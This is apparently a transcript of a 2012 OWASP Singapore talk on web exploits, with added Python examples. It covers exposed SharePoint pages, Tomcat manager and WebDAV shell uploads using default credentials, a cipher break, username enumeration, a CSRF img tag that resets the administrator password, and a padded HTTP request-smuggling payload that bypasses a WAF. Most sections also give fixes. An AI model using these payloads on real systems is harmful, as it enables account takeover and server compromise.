OWASP SG 14nov Ryan Baxendale

The document summarizes several web application exploits found by Ryan Baxendale during security testing. It covers exposed Microsoft SharePoint pages, administrative interfaces (Tomcat manager, WebDAV HTTP methods), insecure JavaScript "encryption" that could be broken with Excel, flaws in "too" factor authentication implementations, a password reset that allowed changing any user's password via CSRF, and bypassing a web application firewall using two requests: one malicious request and a second, harmless one that gets the first past the WAF.


A Rojak of Singapore Web Exploits

Ryan Baxendale OWASP Singapore 14th November 2012

Who Am I?
I am Ryan. I live in Singapore.

Security Consultant at Security-Assessment.com


I find bugs in web applications and hack things

Agenda
Today's rojak includes bugs in:

1. Microsoft SharePoint (Top10-A6-Security Misconfiguration)
2. Administrative Interfaces (Top10-A6-Security Misconfiguration)
3. JavaScript Encryption (Top10-A3-Broken Authentication)
4. Too Factor Authentication (Top10-A3-Broken Authentication)
5. Password Reset (XSRF + Horrible password reset)
6. 2 Requests Are Better Than 1 (WAF Bypass)

Microsoft SharePoint
Intranet content management and document management SharePoint can be used to provide:
intranet portals, document & file management, collaboration, social networks, extranets, websites, enterprise search, and business intelligence

'Publishing' feature can be used to manage larger public website


You might not know that site xyz is running on SharePoint


Microsoft SharePoint
Find additional functionality through the SharePoint site. Try all the default or well-known SharePoint pages:
/AllItems.aspx
/Common.aspx
/MyPage.aspx
/recyclebin.aspx

Nice list from


Stach&Liu SharePoint Hacking Diggity Project

Also look for the admin web interface (SharePoint Central Administration) on a high port, although it is probably not reachable over the internet because of the firewall.

Microsoft SharePoint
isaca.org/_layouts/mobile/mbllists.aspx
Username

Microsoft SharePoint
Upload your own page, edit pages
Links to internal team sites and other confidential things

Create a new page, edit a page

The user that created and modified this item

Microsoft SharePoint
Find the list of user accounts, guess passwords, get access.
All the site content, pages, things that should not be seen by the public, etc. This is the list of users from Active Directory.

I want to hack this account

Microsoft SharePoint
Don't have internal or confidential information on external-facing SharePoint sites.

Firewall the admin port.

Use an ACL to block external IP addresses from accessing the SharePoint administrative pages (such as the /_layouts/ pages shown above).

Administrative Interfaces
Manage web applications and content on web servers
Admin interfaces let you run your own web shell

OWASP states the following objectives:


Administrator level functions are appropriately segregated from user activity
Users cannot access or utilize administrator functionality (boring..)
Provide necessary audit and traceability of administrative functionality

Administrative Interfaces
Usually on port 8080 (Apache Tomcat). Try default usernames and passwords (tomcat:tomcat, admin:tomcat, both:tomcat, manager:tomcat, etc.)
Documentation, if you need help haxx0ring. Upload a metasploit payload.

Links to admin interfaces

Administrative Interfaces
Create a metasploit payload
WAR file and upload


Administrative Interfaces
HTTP Methods (WebDAV)
PUT: put a file on the server, a web shell perhaps?
DELETE: delete a file
INDEX: list the files
PROPFIND: find files (a PROPFIND with Depth: 1 lists a directory), discover backup files

IIS 6.0
WebDAV by default only supports static Web pages, not dynamic pages (ASP)

Administrative Interfaces
Generate metasploit payload
Fix the payload

Upload with Cadaver Run the payload


Administrative Interfaces
Password-protected WebDAV methods
Nobody knew that the server had this functionality, so nobody changed the password.
Guess usernames and passwords with hydra/medusa, then PUT a web shell.

Administrative Interfaces
Find WebDAV-enabled servers with metasploit

Administrative Interfaces
Don't let users connect to admin interfaces. Use firewall rules. https://www.owasp.org/index.php/Administrative_Interface
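The defensive half of the last two sections (SharePoint admin pages reachable from outside, and Tomcat manager or WebDAV methods nobody knew were enabled) is easy to check from the web server's own access log. The following is an added example, not code from the talk: a small detector that flags WebDAV-style methods and requests to admin paths when they come from non-internal addresses. The log lines are constructed for the demo, and the admin path list and internal ranges are assumptions to adapt to your environment.

```python
"""Flag admin-interface and WebDAV activity in web server access logs."""
import ipaddress
import re

# Apache/Tomcat "combined"-style line. IIS W3C logs need a different pattern.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# WebDAV and other write-capable methods that have no business coming from the internet.
WEBDAV_METHODS = {"PUT", "DELETE", "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE"}

# Admin surfaces from the slides: Tomcat manager and SharePoint _layouts pages.
# Assumed list; extend it for the environment.
ADMIN_PATH_PREFIXES = ("/manager/", "/host-manager/", "/_layouts/", "/_admin/")

# Assumed internal ranges (RFC 1918); adjust to the environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def classify(line):
    """Return a short reason if the line is worth an alert, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    if is_internal(m["ip"]):
        return None
    method, path, status = m["method"], m["path"], m["status"]
    if method in WEBDAV_METHODS:
        # 2xx/207 means the method actually worked; 401 means someone is probing.
        return f"webdav-method {method} {path} from {m['ip']} -> {status}"
    if path.lower().startswith(ADMIN_PATH_PREFIXES):
        return f"admin-path {path} from {m['ip']} -> {status}"
    return None


def scan(lines):
    """Run classify() over an iterable of log lines; keep the hits."""
    hits = []
    for line in lines:
        reason = classify(line)
        if reason:
            hits.append((line, reason))
    return hits


# Constructed sample log, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Nov/2012:19:02:11 +0800] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Nov/2012:19:02:15 +0800] "OPTIONS / HTTP/1.1" 200 0',
    '203.0.113.5 - - [14/Nov/2012:19:02:20 +0800] "PROPFIND /backup/ HTTP/1.1" 207 1432',
    '203.0.113.5 - - [14/Nov/2012:19:02:31 +0800] "PUT /cmd.jsp HTTP/1.1" 201 0',
    '198.51.100.7 - - [14/Nov/2012:19:05:02 +0800] "GET /manager/html HTTP/1.1" 401 0',
    '198.51.100.7 - - [14/Nov/2012:19:05:40 +0800] "GET /_layouts/mobile/mbllists.aspx HTTP/1.1" 200 9021',
    '10.1.2.3 - - [14/Nov/2012:19:06:00 +0800] "PUT /docs/report.docx HTTP/1.1" 201 0',
]

if __name__ == "__main__":
    for line, reason in scan(SAMPLE_LOG):
        print(reason)
```

The internal PUT is deliberately left alone: the point of the firewall/ACL advice is that these methods and pages are fine for the intranet and wrong for the internet, so the rule keys on source address rather than on the method alone.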

JavaScript Encryption
JavaScript runs on the client side (browser)
<script> ... JavaScript ... </script>

JavaScript debuggers: Firebug (Firefox), Chrome developer tools, Internet Explorer (View source)

JavaScript Encryption
Client: "We don't use SSL/TLS because we have encrypted passwords"
Implemented in JavaScript. It takes each character of the username/password, e.g. 'a', and changes it to a number, e.g. 23. Characters are separated with 0.
admin gets sent as 2305060340560: a = 23, d = 5, m = 6, i = 34, n = 56

Seems like the password starts with admin too..

JavaScript Encryption
I broke your JavaScript encryption with a l33t BlackHat HaXx0r tool called...
Microsoft Excel
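What the Excel sheet did, as an added example (not the speaker's code): a known-plaintext attack on the scheme above. One captured login for a known username gives the code for every character in it; from then on any other captured value can be decoded, and a chosen username can be re-encoded. The scheme is reconstructed from the slide only, so the five codes shown there are the only real ones; any other mapping would have to be recovered from further captures.

```python
"""Break the slide's JavaScript "encryption" with one known username."""

SEPARATOR = "0"


def tokens(cipher):
    """Split the numeric string on the "0" separator, dropping the trailing empty field.

    Caveat: a code containing its own 0 digit (say 10) is ambiguous under this scheme.
    Nothing on the slide shows such a code, so this parser assumes none exist.
    """
    parts = cipher.split(SEPARATOR)
    if parts and parts[-1] == "":
        parts.pop()
    return parts


def recover_table(known_plain, known_cipher):
    """Known-plaintext attack: pair each plaintext character with its code."""
    codes = tokens(known_cipher)
    if len(codes) != len(known_plain):
        raise ValueError("token count does not match plaintext length")
    table = {}
    for ch, code in zip(known_plain, codes):
        if table.get(code, ch) != ch:
            raise ValueError(f"code {code} maps to both {table[code]} and {ch}")
        table[code] = ch
    return table


def decode(cipher, table):
    """Decode with the recovered table; codes not yet recovered show as ?<code>."""
    return "".join(table.get(code, f"?{code}") for code in tokens(cipher))


def encode(plain, table):
    """Re-encode a chosen value, e.g. to submit a login for a different account."""
    inverse = {ch: code for code, ch in table.items()}
    return SEPARATOR.join(inverse[ch] for ch in plain) + SEPARATOR


# From the slide: the username "admin" is sent as 2305060340560.
TABLE = recover_table("admin", "2305060340560")

if __name__ == "__main__":
    print(TABLE)
    print(decode("2305060340560", TABLE))   # the username
    print(decode("6023", TABLE))            # "ma": two known codes in a new order
    print(encode("admin", TABLE))           # round-trips to the captured value
```

A few more captured logins fill in the rest of the table; with a fixed per-character mapping there is no key to recover, which is why the slide calls this a substitution cipher and not encryption.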

JavaScript Encryption
JavaScript with Public/Private key encryption
Server: "Hey ;) Here's my public key"
Browser: User: AsianGirl2012 Password: ChickenRice1
Browser: Encrypt( Public Key, Credentials )
On the wire: User: J#^ZML@)*FMA& Password: acE($2mvT$^m!fG
Server: Decrypt( Private Key, Credentials )
Eavesdropper: ??? Where is the chicken rice?
Server: User: AsianGirl2012 Password: ChickenRice1

JavaScript Encryption
A substitution cipher is not encryption. JavaScript makes secret keys visible to the user, so a symmetric key embedded in the page protects nothing. If you must encrypt in JavaScript, use public/private key encryption so that only the public key is shipped to the browser, and use it in addition to SSL/TLS, not instead of it.

Too Factor Authentication


Two-factor authentication requires the use of two of the three authentication factors:
Something the user knows (password, PIN)
Something the user has (ATM card, smart card)
Something the user is (biometric characteristic, such as a fingerprint)

Most of the time it ends up being knows (password) and has (token). Too factor authentication is...

Too Factor Authentication


First login/signup for Too factor authentication Login with Too factor authentication


Verbose error message and step by step authentication

Too Factor Authentication


Find a list of common names for the typical customers, then use Burp Intruder:
Send every name as the username
Look at the response
Name list (excerpt): Aban, Abbas, Abbud, Abbudin, Abdul, Abdel, Abdal, Abdul Adl, Abdul-Ahad, Abdul-Alim, Abdul-Aliyy, Abdul-Azim, Abdul-Aziz

Now we know all the usernames. Continue by doing the same thing on the next step of this broken authentication.
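The enumeration above works because each step answers on its own and says why it failed. As an added example (not code from the talk), here is that flow as a constructed stand-in, beside a hardened version, and the Intruder logic run against both: send every name, keep the ones whose response differs from a known miss. The user store, name list and HMAC-based token are invented for the demo.

```python
"""Username enumeration through verbose, step-by-step 2FA errors."""
import hashlib
import hmac

# Constructed user store: username -> (password, per-user token seed). Not real accounts.
USERS = {
    "abdul": ("ChickenRice1", b"seed-1"),
    "abdul-aziz": ("Laksa2012", b"seed-2"),
}

# Excerpt of a common-names wordlist like the one fed to Burp Intruder on the slide.
NAME_LIST = ["aban", "abbas", "abbud", "abbudin", "abdul", "abdel", "abdal", "abdul-ahad", "abdul-aziz"]


def demo_token(username):
    """Stand-in for the 'have' factor: HMAC of a fixed counter under the user's seed."""
    seed = USERS.get(username, ("", b""))[1]
    return hmac.new(seed, b"counter-0", hashlib.sha256).hexdigest()[:6]


def verbose_step1(username):
    """Vulnerable step 1: the response alone says whether the account exists."""
    if username not in USERS:
        return 404, "Unknown user"
    return 200, "Enter password"


def verbose_step2(username, password):
    """Vulnerable step 2: same leak for the password, before the token is ever asked for."""
    if username not in USERS:
        return 404, "Unknown user"
    if USERS[username][0] != password:
        return 401, "Wrong password"
    return 200, "Enter token"


def hardened_login(username, password, token):
    """Hardened: all factors in one step, one generic failure, constant-time compares."""
    record = USERS.get(username, ("", b""))           # dummy record keeps the work uniform
    expected_token = hmac.new(record[1], b"counter-0", hashlib.sha256).hexdigest()[:6]
    ok = hmac.compare_digest(record[0].encode(), password.encode())
    ok &= hmac.compare_digest(expected_token.encode(), token.encode())   # no short-circuit
    ok &= username in USERS
    return (200, "Welcome") if ok else (401, "Login failed")


def enumerate_users(step, names):
    """Intruder-style: send every name, keep the ones whose response differs from a known miss."""
    baseline = step("zz-no-such-user")
    return [name for name in names if step(name) != baseline]


if __name__ == "__main__":
    print("verbose :", enumerate_users(verbose_step1, NAME_LIST))
    print("hardened:", enumerate_users(lambda n: hardened_login(n, "guess", "000000"), NAME_LIST))
```

Intruder does the same comparison by response length or a grep match; the hardened handler gives it nothing to sort on, and collecting all three inputs in one request also removes the per-step brute force the slides go on to describe.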

Too Factor Authentication


But wait, there's more

Too Factor Authentication


Some things are just not the same: two instances of the same factor are not two factors. 2FA is a combination of two of know, have, is.

Password Reset
Password reset
Typically an admin function to change a user's password to a randomly generated password and securely transmit the new password to the user

A typical reset password page for a user
Asks for email/username, maybe a secret question
Sends a unique password reset link to the email address

A typical change password page
Asks for the old password, the new password, and confirmation of the new password

Password Reset
Once upon a time a lazy developer needed to create a reset password page.
"Let's just take the change password page and make a few changes." Great idea!......for pen testers.

If a typical change password page takes username (from session), old password, new password and confirmed new password as input...
...then creating a password reset page would only need the following input: username and new password.

Password Reset
Password reset page accepted the following:
Hidden input useraccount, set to administrator (because we are the admin, right?)
Hidden input oldPassword, set to administrator
Password and confirmpasswd, set to the new password
userID, set to the victim's username

Let's get access to the admin account with Cross Site Request Forgery (XSRF/CSRF).
Create an image tag with a request to change the password:

<img src="https://website/LoginServlet?action=resetpassword&useraccount=administrator&oldPassword=administrator&Password=password4444&confirmpasswd=password4444&userID=administrator&CALLER=" />

Password Reset
To get it working:
The admin needs to view a page with the CSRF img tag
The admin must be logged into the application in the same web browser
Possible ways to share your img tag: web forum, profile signature, a note created with the HTML editor (TinyMCE), a personal message
You get to login as Administrator with password4444
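The attack and the fix side by side, as an added example that is not the speaker's code: a constructed stand-in for the reset servlet that behaves as the slides describe (any HTTP method, target user taken from the request, no CSRF token, old password never checked), a function that builds the img tag with the slide's parameter names, and a hardened handler that binds the target account to the session and requires a POST, a per-session token and the current password. The password store and session table are invented for the demo.

```python
"""The slide's reset-page CSRF next to a version that resists it."""
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

PASSWORDS = {"administrator": "administrator", "ryan": "hunter2"}   # constructed store
SESSIONS = {}   # session cookie value -> {"user": ..., "csrf": ...}


def login(user, session_id):
    """Create a session and a per-session CSRF token; returns the token."""
    SESSIONS[session_id] = {"user": user, "csrf": secrets.token_hex(16)}
    return SESSIONS[session_id]["csrf"]


def reset_url(base, victim, new_password):
    """The URL from the slide's img tag, built with the same parameter names."""
    query = urlencode({
        "action": "resetpassword",
        "useraccount": victim, "oldPassword": victim,          # 'hidden' inputs the attacker controls
        "Password": new_password, "confirmpasswd": new_password,
        "userID": victim, "CALLER": "",
    })
    return f"{base}/LoginServlet?{query}"


def csrf_img_tag(base, victim, new_password):
    """Anything the admin's browser renders (forum post, signature, note) fires this GET with the admin's cookie."""
    return f'<img src="{reset_url(base, victim, new_password)}" />'


def vulnerable_reset(method, url, session_id):
    """Vulnerable, as on the slide: any method, target user from the request, no token, old password unchecked."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if session_id not in SESSIONS or params.get("action") != "resetpassword":
        return 403
    if params.get("Password") != params.get("confirmpasswd"):
        return 400
    PASSWORDS[params["userID"]] = params["Password"]   # 'method' is never looked at
    return 200


def hardened_reset(method, form, session_id, csrf_token):
    """Hardened: POST only, target user bound to the session, CSRF token and old password required."""
    sess = SESSIONS.get(session_id)
    if method != "POST" or sess is None:
        return 403
    if not secrets.compare_digest(csrf_token, sess["csrf"]):      # a cross-site page cannot read this
        return 403
    user = sess["user"]                                            # never from a request parameter
    if not secrets.compare_digest(form.get("oldPassword", ""), PASSWORDS[user]):
        return 401
    new = form.get("Password", "")
    if not new or new != form.get("confirmpasswd"):
        return 400
    PASSWORDS[user] = new
    return 200


if __name__ == "__main__":
    login("administrator", "s1")
    print(csrf_img_tag("https://website", "administrator", "password4444"))
    print(vulnerable_reset("GET", reset_url("https://website", "administrator", "password4444"), "s1"))
    print(PASSWORDS["administrator"])
```

Any one of the hardened checks defeats the img tag on its own: an image fetch cannot carry a POST body, cannot supply the token, and does not know the admin's current password. Tying the account to the session removes the "change any user's password" part even for a logged-in attacker.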

Password Reset
Don't be a lazy developer

2 Requests Are Better Than 1


One day I was testing a web application.
It gets tested often, and by lots of different people/companies.

So at this point it's one of the most boring (secure) applications a pen tester can come across.

2 Requests Are Better Than 1


I found a directory traversal bug where I request /app/test../../../ and get a directory listing.

This wasn't too interesting because I could only see the directory listing, but never access those files or folders.
Something strange was going on...

2 Requests Are Better Than 1


Then, using Burp Intruder with a list of common files and folders (such as the DirBuster wordlist),
I found /app/test../../../console

2 Requests Are Better Than 1


This bug was only in the UAT environment.
I need to get this bug working in production.

But the client has a WAF, so they're safe, right?...

There's a web application firewall (WAF) that looks at all the requests and decides if they should be forwarded on to the web server.
So how do we trick the WAF into forwarding anything?

2 Requests Are Better Than 1


There's a strange bug in a few web servers:
(1) "Reports indicate that Microsoft IIS 5.0 truncates requests that contain a body of greater than 48 KB in length. After 49152 bytes of a request body are handled, IIS terminates the request and starts to parse a new request."
(2) "There appears to be a bug strangely, IIS/5.0 silently truncates the body after 48K (49,152 bytes) we can smuggle a request in the last x bytes of the body."
(3) "If the size of the request exceeds a particular threshold (by default, 48 KB), then the ISAPI or CGI code to which the request is directed needs to be aware of chunked-transfer encoding to process the request correctly."

(1) www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21219
(2) www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
(3) hostingadministration.blogspot.sg/2008/01/urlscan-security-tool-faq.html

2 Requests Are Better Than 1


A basic HTTP POST request before smuggling:

POST /crosstraining/aboutyou2.php HTTP/1.1
Host: www.webscantest.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.webscantest.com/crosstraining/aboutyou2.php
Cookie: SESSIONID_VULN_SITE=4vdvho53o3vk9tjr94lks786q3
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

returnto=aboutyou2.php&fname=Ryan&nick=Security-Assessment&lname=OWASP&submit=submit

2 Requests Are Better Than 1


The idea is to send one big evil request, and a normal request directly after it. The big evil request has to be more than 48kb:
We have to include what we need to send (parameters etc.)
Then fill the rest of the space with garbage

POST /test../../../console/adminlogin.jsp HTTP/1.1
Host: .
Content-length: 49152

username=admin&password=admin&ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage
GET /happy.nice.users.normal.page.jsp HTTP/1.1
Host:

2 Requests Are Better Than 1


Uncheck "Update Content-Length": we want to manually specify that it's a bit more than 48kb. This is our malicious request.

48kb in bytes is 49152. The first request must be larger than 48kb, and the Content-Length must be larger than 48kb.
Now we fill the request with 48kb of garbage. This is our normal request that returns 404, but allows us to get our evil request to the web server.
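The mechanism behind the two-request trick, as an added example that is not the speaker's Burp setup: build_payload() lays the bytes out as the slides do (login parameters, filler up to exactly 48 KB, then the harmless GET, all covered by one declared Content-Length), and two constructed parsers read that stream. One honours Content-Length and sees a single request; the other stops reading a body at 49152 bytes, as the quoted reports describe for IIS 5.0, and sees two. Whichever component in the chain (WAF or web server) is the truncating one, the two disagree about where one request ends and the next begins, and that disagreement is the smuggling primitive. Neither parser is real IIS or WAF code; host and paths are taken from the slide or invented.

```python
"""Build the slide's padded request and show how a 48 KB body truncation splits it."""
TRUNCATE_AT = 48 * 1024   # 49152 bytes, the threshold the quoted reports give for IIS 5.0

EVIL_PATH = "/test../../../console/adminlogin.jsp"
BENIGN_PATH = "/happy.nice.users.normal.page.jsp"


def build_payload(host, evil_path, params, benign_path):
    """One POST: parameters, filler up to exactly 48 KB, then a harmless GET.

    The declared Content-Length covers the GET too, so a parser that honours it
    sees a single large request, while one that stops reading the body at 48 KB
    sees the GET as a second request.
    """
    smuggled = f"GET {benign_path} HTTP/1.1\r\nHost: {host}\r\n\r\n".encode()
    prefix = (params + "&filler=").encode()
    if len(prefix) > TRUNCATE_AT:
        raise ValueError("parameters alone exceed the truncation threshold")
    body = prefix + b"A" * (TRUNCATE_AT - len(prefix)) + smuggled
    head = (f"POST {evil_path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


def _parse_one(buf, max_body):
    """Parse one request; return (method, path, body_bytes_consumed, remaining_stream)."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return None
    head, rest = buf[:end].decode("latin-1"), buf[end + 4:]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    declared = 0
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            declared = int(value.strip())
    take = declared if max_body is None else min(declared, max_body)
    return method, path, take, rest[take:]


def split_requests(stream, max_body=None):
    """Model of a front end reading a byte stream into requests.

    max_body=None: honour Content-Length (a compliant parser).
    max_body=TRUNCATE_AT: stop after 48 KB of body and start a new request
    (the IIS 5.0 behaviour the slide quotes). Constructed model, not real server code.
    """
    requests = []
    while stream:
        parsed = _parse_one(stream, max_body)
        if parsed is None:
            break
        method, path, body_len, stream = parsed
        requests.append((method, path, body_len))
    return requests


PAYLOAD = build_payload("target.example", EVIL_PATH, "username=admin&password=admin", BENIGN_PATH)

if __name__ == "__main__":
    print("compliant :", split_requests(PAYLOAD))
    print("truncating:", split_requests(PAYLOAD, TRUNCATE_AT))
```

Run it and the compliant view is one POST with a body a little over 48 KB, while the truncating view is that POST with exactly 49152 bytes of body followed by a separate GET. The same disagreement is what the WAF-bypass recap warns about: a WAF that parses HTTP differently from the server behind it is checking a request the server never sees.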


2 Requests Are Better Than 1


Response from the server, as if we sent a normal request.

Probably using IIS 5 or 6 with custom ISAPI filters, or an appliance such as CheckPoint FW-1 with Web Intelligence.

2 Requests Are Better Than 1


Now let's login
Username and password to login

Login error: wrong user and password

Burp Intruder to the rescue! Brute force the password for admin

2 Requests Are Better Than 1


Winning!

Let's deploy our own web app and get shell :D

2 Requests Are Better Than 1


Don't rely on a web app firewall (WAF) to fix web app vulnerabilities. Fix the code.


Recap
Microsoft SharePoint
Keep internal and external sites separate

Administrative Interfaces
Don't let users connect to them, change default passwords

JavaScript Encryption
Don't use your own encryption, use public/private key crypto (on top of SSL/TLS, not instead of it)

Too Factor Authentication
Remove verbosity from error messages, find out what 2FA is

Password Reset
Don't be a lazy developer

2 Requests Are Better Than 1
A web app firewall (WAF) doesn't fix broken code, fix the code

Questions? Comments?
Contact: ryan.baxendale@security-assessment.com

Think you can hack? Got talent? We are hiring!
Invite more people to OWASP meetings. Sign up and be active on the OWASP Singapore mailing list:
https://lists.owasp.org/mailman/listinfo/owasp-singapore
